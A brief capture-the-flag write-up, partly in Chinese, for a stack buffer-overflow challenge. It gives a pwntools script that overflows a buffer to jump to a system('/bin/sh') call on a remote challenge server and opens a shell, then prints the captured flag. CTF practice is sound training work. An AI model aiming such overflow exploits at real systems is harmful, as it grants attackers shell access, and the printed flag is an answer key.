ctf/l3hsec-writeup/README.md

stack

用ida一看，找到字符串和ebp差0x3a，然后发现在0x080491E2有system("/bin/sh")。没了。

from pwn import *
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
p = remote("159.65.68.241", 10003)
p.sendline(pld)
p.interactive()

flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}